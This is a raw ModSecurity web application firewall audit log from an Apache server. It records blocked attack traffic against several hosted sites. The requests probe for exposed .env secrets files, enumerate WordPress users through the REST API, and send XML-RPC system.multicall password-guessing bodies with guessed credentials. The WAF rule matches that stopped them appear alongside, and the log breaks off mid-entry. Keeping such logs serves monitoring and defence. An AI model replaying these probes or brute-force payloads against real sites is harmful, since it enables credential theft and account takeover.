ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f7f706f-Z-- --1692f729-A-- [22/May/2025:17:15:32 +0700] aC75RGfriXjg62qQwE9j4AAAAJE 103.236.140.4 50134 103.236.140.4 8181 --1692f729-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-N950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --1692f729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1692f729-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747908932319019 833 (- - -) Stopwatch2: 1747908932319019 833; combined=367, p1=326, p2=0, p3=0, p4=0, p5=41, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1692f729-Z-- --d1ef625b-A-- [22/May/2025:17:26:07 +0700] aC77v-ThJmFSRJ5-OZfYVgAAAEQ 103.236.140.4 50468 103.236.140.4 8181 --d1ef625b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.62.39.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.62.39.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1ef625b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1ef625b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747909567107062 3023 (- - -) Stopwatch2: 1747909567107062 3023; combined=1344, p1=466, p2=848, p3=0, p4=0, p5=29, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1ef625b-Z-- --4f6fea64-A-- [22/May/2025:17:26:13 +0700] aC77xeThJmFSRJ5-OZfYVwAAAFc 103.236.140.4 50478 103.236.140.4 8181 --4f6fea64-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --4f6fea64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f6fea64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747909573977136 762 (- - -) Stopwatch2: 1747909573977136 762; combined=338, p1=296, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f6fea64-Z-- --7570477d-A-- [22/May/2025:17:32:43 +0700] aC79S-ThJmFSRJ5-OZfYaQAAAFI 103.236.140.4 50706 103.236.140.4 8181 --7570477d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.160.28.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.160.28.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7570477d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7570477d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747909963974163 3060 (- - -) Stopwatch2: 1747909963974163 3060; combined=1367, p1=480, p2=853, p3=0, p4=0, p5=34, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7570477d-Z-- --3b899a14-A-- [22/May/2025:17:51:19 +0700] aC8Bpyektx75wRFPQyj8cgAAAMI 103.236.140.4 51378 103.236.140.4 8181 --3b899a14-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 134.122.28.88 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3b899a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b899a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747911079897506 848 (- - -) Stopwatch2: 1747911079897506 848; combined=302, p1=264, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b899a14-Z-- --ddc68207-A-- [22/May/2025:18:22:46 +0700] aC8JBuThJmFSRJ5-OZfY_AAAAEc 103.236.140.4 52394 103.236.140.4 8181 --ddc68207-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 120.138.19.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 120.138.19.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ddc68207-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddc68207-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747912966798284 3377 (- - -) Stopwatch2: 1747912966798284 3377; combined=1462, p1=464, p2=965, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddc68207-Z-- --4c8d6568-A-- [22/May/2025:18:36:02 +0700] aC8MIn0O04WKE1HJ5iR0-wAAABE 103.236.140.4 52856 103.236.140.4 8181 --4c8d6568-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4c8d6568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8d6568-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913762111746 933 (- - -) Stopwatch2: 1747913762111746 933; combined=354, p1=311, p2=0, p3=0, p4=0, p5=43, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8d6568-Z-- --86400140-A-- [22/May/2025:18:36:03 +0700] aC8MI-ThJmFSRJ5-OZfZngAAAFY 103.236.140.4 52860 103.236.140.4 8181 --86400140-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --86400140-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86400140-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913763239267 753 (- - -) Stopwatch2: 1747913763239267 753; combined=292, p1=255, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86400140-Z-- --bf78c561-A-- [22/May/2025:18:36:04 +0700] aC8MJOThJmFSRJ5-OZfZnwAAAEM 103.236.140.4 52862 103.236.140.4 8181 --bf78c561-B-- GET /.env.prod HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bf78c561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf78c561-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913764363398 534 (- - -) Stopwatch2: 1747913764363398 534; combined=185, p1=158, p2=0, p3=0, p4=0, p5=26, sr=48, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf78c561-Z-- --540eff67-A-- [22/May/2025:18:36:05 +0700] aC8MJeThJmFSRJ5-OZfZoAAAAFE 103.236.140.4 52864 103.236.140.4 8181 --540eff67-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --540eff67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --540eff67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913765534962 886 (- - -) Stopwatch2: 1747913765534962 886; combined=374, p1=333, p2=0, p3=0, p4=0, p5=41, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --540eff67-Z-- --6810f91c-A-- [22/May/2025:18:36:06 +0700] aC8MJuThJmFSRJ5-OZfZogAAAEA 103.236.140.4 52868 103.236.140.4 8181 --6810f91c-B-- GET /dev/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6810f91c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6810f91c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913766648081 773 (- - -) Stopwatch2: 1747913766648081 773; combined=320, p1=281, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6810f91c-Z-- --ef6ab877-A-- [22/May/2025:18:36:07 +0700] aC8MJ-ThJmFSRJ5-OZfZowAAAFM 103.236.140.4 52870 103.236.140.4 8181 --ef6ab877-B-- GET /application/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ef6ab877-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef6ab877-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913767552030 703 (- - -) Stopwatch2: 1747913767552030 703; combined=273, p1=240, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef6ab877-Z-- --02f84529-A-- [22/May/2025:18:44:50 +0700] aC8OMn0O04WKE1HJ5iR1FAAAABg 103.236.140.4 53394 103.236.140.4 8181 --02f84529-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --02f84529-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel1234FaAdHeL --02f84529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02f84529-E-- --02f84529-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747914290295497 6234 (- - -) Stopwatch2: 1747914290295497 6234; combined=4347, p1=536, p2=3635, p3=0, p4=0, p5=103, sr=103, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02f84529-Z-- --6e2cdb28-A-- [22/May/2025:18:48:03 +0700] aC8O8-ThJmFSRJ5-OZfaJgAAAEM 103.236.140.4 53524 103.236.140.4 8181 --6e2cdb28-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6e2cdb28-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelMeseofaadhel@21 --6e2cdb28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e2cdb28-E-- --6e2cdb28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747914483383691 6317 (- - -) Stopwatch2: 1747914483383691 6317; combined=4516, p1=532, p2=3729, p3=0, p4=0, p5=152, sr=90, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e2cdb28-Z-- --b67d4434-A-- [22/May/2025:18:49:23 +0700] aC8PQ-ThJmFSRJ5-OZfaKAAAAFM 103.236.140.4 53642 103.236.140.4 8181 --b67d4434-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b67d4434-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel16!# --b67d4434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b67d4434-E-- --b67d4434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.249 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747914563568019 6182 (- - -) Stopwatch2: 1747914563568019 6182; combined=4419, p1=525, p2=3668, p3=0, p4=0, p5=135, sr=86, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b67d4434-Z-- --7444452d-A-- [22/May/2025:18:54:15 +0700] aC8QZ-ThJmFSRJ5-OZfaTwAAAE0 103.236.140.4 53820 103.236.140.4 8181 --7444452d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7444452d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel!@#$%^&*() --7444452d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7444452d-E-- --7444452d-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1747914855162781 3408 (- - -) Stopwatch2: 1747914855162781 3408; combined=2495, p1=258, p2=2098, p3=16, p4=17, p5=63, sr=47, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7444452d-Z-- --f12d3904-A-- [22/May/2025:18:55:16 +0700] aC8QpGfriXjg62qQwE9k4QAAAIY 103.236.140.4 53870 103.236.140.4 8181 --f12d3904-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 128.199.168.182 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 128.199.168.182 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f12d3904-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel&faadhel& --f12d3904-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --f12d3904-E-- --f12d3904-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1747914916586154 6113 (- - -) Stopwatch2: 1747914916586154 6113; combined=4944, p1=504, p2=4129, p3=38, p4=43, p5=139, sr=87, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f12d3904-Z-- --fd94eb19-A-- [22/May/2025:18:59:08 +0700] aC8RjH0O04WKE1HJ5iR1NAAAABE 103.236.140.4 53984 103.236.140.4 8181 --fd94eb19-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.249 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.249 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fd94eb19-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1688antix --fd94eb19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd94eb19-E-- --fd94eb19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 